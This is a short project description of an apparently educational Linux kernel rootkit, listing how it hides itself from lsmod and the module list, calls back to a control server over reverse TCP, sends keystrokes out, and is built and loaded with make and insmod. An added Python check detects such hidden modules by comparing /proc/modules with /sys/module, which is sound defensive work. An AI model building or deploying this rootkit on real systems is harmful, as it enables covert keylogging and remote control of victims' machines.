A simple conceptual Linux rootkit.
How it works:
– Hide the module:
+ Option 1: Overwrite “lsmod”.
+ Option 2: Delete the “rootkit” entry from the kernel's module list.
– Configure the rootkit as a client:
+ It connects out to the control server on the 192.168.1.0/24 subnet.
+ This connection is therefore a reverse-TCP connection.
Functions:
– Send the keyboard buffer to the control server.
– Add network-listening functionality.
– Filter out “ACK” numbers from TCP packets.
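A defender-side check for the module-hiding approach in option 2 above, added here as an example; it is not code from the Concept-Rootkit project. It assumes a Linux host where loaded modules expose attributes such as initstate and refcnt under /sys/module (built-in modules do not), and the sample listings are constructed.

```python
from pathlib import Path

# A loadable module that unlinks itself from the kernel's module list disappears
# from /proc/modules (which lsmod reads), but its /sys/module/<name>/ directory
# normally stays behind. Loaded modules carry attributes such as 'initstate' and
# 'refcnt' that built-in modules lack, so an entry with those attributes and no
# /proc/modules line is a hiding candidate worth investigating.
LOADABLE_ATTRS = ("initstate", "refcnt")

def parse_proc_modules(text: str) -> set[str]:
    """Return module names from /proc/modules-style text (first field per line)."""
    return {line.split()[0] for line in text.splitlines() if line.split()}

def find_hidden_modules(proc_text: str, sysfs: dict[str, set[str]]) -> list[str]:
    """Return loadable modules seen in a {name: attribute names} view of /sys/module
    that have no corresponding /proc/modules line."""
    listed = parse_proc_modules(proc_text)
    return sorted(
        name for name, attrs in sysfs.items()
        if any(a in attrs for a in LOADABLE_ATTRS) and name not in listed
    )

def snapshot_sysfs_modules(root: str = "/sys/module") -> dict[str, set[str]]:
    """Read the live /sys/module tree (Linux only) into the dict form used above."""
    base = Path(root)
    if not base.is_dir():
        return {}
    return {p.name: {c.name for c in p.iterdir()} for p in base.iterdir() if p.is_dir()}

def scan_live_system() -> list[str]:
    """Run the check against the running kernel; an empty list means nothing hidden."""
    try:
        proc_text = Path("/proc/modules").read_text()
    except OSError:  # not Linux, or /proc not mounted
        return []
    return find_hidden_modules(proc_text, snapshot_sysfs_modules())

# Constructed sample: 'rootkit' has loadable-module attributes in sysfs but no
# /proc/modules line; 'ext4' is built in and only exposes 'parameters'.
SAMPLE_PROC_MODULES = (
    "nf_tables 200704 0 - Live 0x0000000000000000\n"
    "e1000 163840 0 - Live 0x0000000000000000\n"
)
SAMPLE_SYSFS = {
    "nf_tables": {"initstate", "refcnt", "coresize", "sections"},
    "e1000": {"initstate", "refcnt", "parameters"},
    "ext4": {"parameters"},
    "rootkit": {"initstate", "refcnt", "coresize", "sections"},
}
```

Calling scan_live_system() on a Linux host applies the same comparison to the real /proc/modules and /sys/module; any name it returns is a module that is loaded but not listed.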
Usage:
* START: $> insmod rootkit.ko
* STOP : $> rmmod rootkit
Installation:
git clone https://github.com/AIPSec/Concept-Rootkit
cd Concept-Rootkit/src
make
Source: https://github.com/AIPSec